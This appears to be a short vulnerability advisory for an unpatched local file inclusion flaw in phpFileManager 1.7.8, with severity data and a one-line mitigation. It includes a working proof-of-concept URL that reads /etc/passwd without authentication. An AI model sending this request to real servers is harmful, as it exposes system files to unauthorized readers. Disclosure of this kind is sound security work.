vendor:
phpFileManager
by:
Murat Kalafatoglu
7.5
CVSS
HIGH
Local File Inclusion
98
CWE
Product Name: phpFileManager
Affected Version From: 1.7.8
Affected Version To: 1.7.8
Patch Exists: NO
Related CWE: N/A
CPE: a:phpfm:phpfm:1.7.8
Metasploit:
N/A
Other Scripts:
N/A
Platforms Tested: XAMPP for Linux
2019
phpFileManager 1.7.8 – Local File Inclusion
Any user can read files from the server without authentication due to an existing LFI in the following path: http://target/index.php?action=3&fm_current_dir=%2Fetc%2F&filename=passwd
Mitigation:
Input validation and authentication should be implemented to prevent LFI attacks.